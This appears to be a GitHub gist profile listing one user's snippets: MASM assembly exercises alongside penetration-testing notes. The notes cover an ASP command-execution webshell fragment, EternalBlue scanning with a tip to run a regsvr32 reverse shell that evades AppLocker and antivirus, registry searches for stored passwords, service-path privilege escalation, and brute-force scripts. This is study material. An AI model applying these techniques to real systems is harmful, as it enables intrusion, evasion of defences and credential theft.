Skip to content

Instantly share code, notes, and snippets.

View dumpmycode's full-sized avatar

dumpmycode

View GitHub Profile
@dumpmycode
dumpmycode / MASMexercises.md
Last active June 9, 2023 22:44
Assembly Language by Kip Irvine exercises
  1. Swap elements in array, e[0] with e[1], e[2] with e[3] and so on. Need to read more on faster xchg instruction, xor?
	var dd 1,2,3,4,5,6,7,8
		mov esi, OFFSET var
		mov ecx, LENGTHOF var / 2       ; processing 2 elements at one time
	xchgloop:
       		mov eax, DWORD PTR [esi]        ; eax=1
        	xchg eax, DWORD PTR [esi+4]     ; put 1 in esi+4 and put [esi+4] in eax
       		mov DWORD PTR [esi], eax        ; put [esi+4] in esi+0
        	add esi, TYPE var * 2           ; move to next 2 elements
@dumpmycode
dumpmycode / MASM notes
Last active April 9, 2023 19:51
==============================================================================================
FLAGS - Visual Studio
| Overflow | OV | 1 = Overflow | 0 = No Overflow
| Direction | UP | 1 = Down | 0 = Up
| Interrupt | EI | 1 = Enabled | 0 = Disabled
| Sign | PL | 1 = Negative | 0 = Positive
| Zero | ZR | 1 = Zero | 0 = Not Zero
| Auxiliary | AC |
| Parity | PE | 1 = Even | 0 = Odd
| Carry | CY | 1 = Carry | 0 = No Carry
@dumpmycode
dumpmycode / NotesOnASP.md
Last active May 8, 2019 09:47
Notes on ASP/ASPX webshells

Notes on asp/aspx shells on IIS: found a great pdf regarding this topic by Joseph Giron.

In the document, it details some old school methods of 'interacting' with server side process. We'll need a way to insert the asp code somehow, usually in CTFs we can do this via R/W FTP access or RFI.

  1. ASP shell with VB by using Wscript.shell to execute commands given from url input
  • example: 
    <%
Set command = Request.QueryString("cmd")
if command == "" then
Response.Write("No Command Entered!");
@dumpmycode
dumpmycode / NotesOnEB.md
Created May 7, 2019 10:40
EternalBlue

Notes for eternal blue (SMB port 445 attack)

Use nmap to check if a port is vulnerable to eb nmap -n -Pn --script=vuln x.x.x.x -p 445

  • Named pipe is required for manual exploit, enumerate by using pipe_auditor msf module
  • Opting for reverse shell called from regsvr32 to bypass applocker. Calling binaries directly from cmd usually will get flagged by AV, calling binaries from regsvr32 unregistered dll most likely OK as regsvr32 often used by OS (whitelisted).
@dumpmycode
dumpmycode / WinPrivEsc.md
Last active April 10, 2022 18:56
Windows Privilege Escalation notes

First, get more info on system.

  • systeminfo, whoami /priv*, set or echo %username%

    • check for Hotfixes, OS name, version, arch, environment variables & system (vm). Then look for vulns respective of system.

  • reg query HKLM /f password /t REG_SZ /s, wmic or sc query

    • check for PS version, see if we can run reg query, wmic or sc commands for further info on system.

*Privilege escalation by abusing token privilege (foxglovesecurity blog). Required permission to escalate:

  • SeImpersonatePrivilege
@dumpmycode
dumpmycode / rpc brute force.py
Last active May 29, 2024 13:01
rpcclient brute force
#!/usr/bin/python3
import argparse
import threading
import subprocess as s
import queue
import sys
import time
class workerthread(threading.Thread):
@dumpmycode
dumpmycode / Unquoted service path (DOS)
Created December 4, 2018 02:38
Unquoted service path (DOS)
# Get service names without admin access (wmic)
sc query | findstr SERVICE_NAME >> test.txt
# process the file service names for unquoted service path
# tokens=2 will take the second delimited value and put it in %A
for /F "tokens=2 delims=:" %A in (test.txt) do sc qc%A | findstr BINARY_PATH_NAME >> unquoted.txt
# Once we determine which application is vulnerable to this exploit, we then check for write permission
# on that particular folder so we can replace application with our own in hope of getting privilege escalation.
BINARY_PATH_NAME : C:\Program Files\Common Files\LogiShrd\Bluetooth\lbtserv.exe
@dumpmycode
dumpmycode / note.txt
Last active November 1, 2018 01:02
VMAwareMalware
Ways that a malware can check for virtual environment
• Checking the MAC address of the virtual network adaptor to try and reveal the virtual machine vendor.
• Checking the BIOS brand and version to reveal the virtual machine vendor.
• Checking certain registry keys that are unique to virtual machines.
Often, the virtual machines leave traces in different registry keys.
For example the existence of • “HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__” reveals the presence of VirtualBox.
• Checking if helper tools, such as VMware tools, are installed.
• Checking for the presence of certain process and service names.
• Checking for the presence of specific files, like drivers specific to virtualization.
• Checking for communication ports for guest-to-host communication.
@dumpmycode
dumpmycode / diff.py
Created September 7, 2016 04:51
File compare
#!/usr/bin/env python
# author:op
# this script tries to loop every line in file1 and compare it to all lines in file2
# spits out what's not matching
import argparse
parser = argparse.ArgumentParser(description='Find difference between file1.txt and file2.txt')
parser.add_argument('filename1')
parser.add_argument('filename2')
@dumpmycode
dumpmycode / brute.py
Last active August 13, 2016 05:25
Bandit24->25 bruteforce
#! /usr/bin/env python
# Author: op
# Trying to measure script run time including printing output to screen
# seems like it only measure execution time.
import socket
import time
pwd = 'UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ '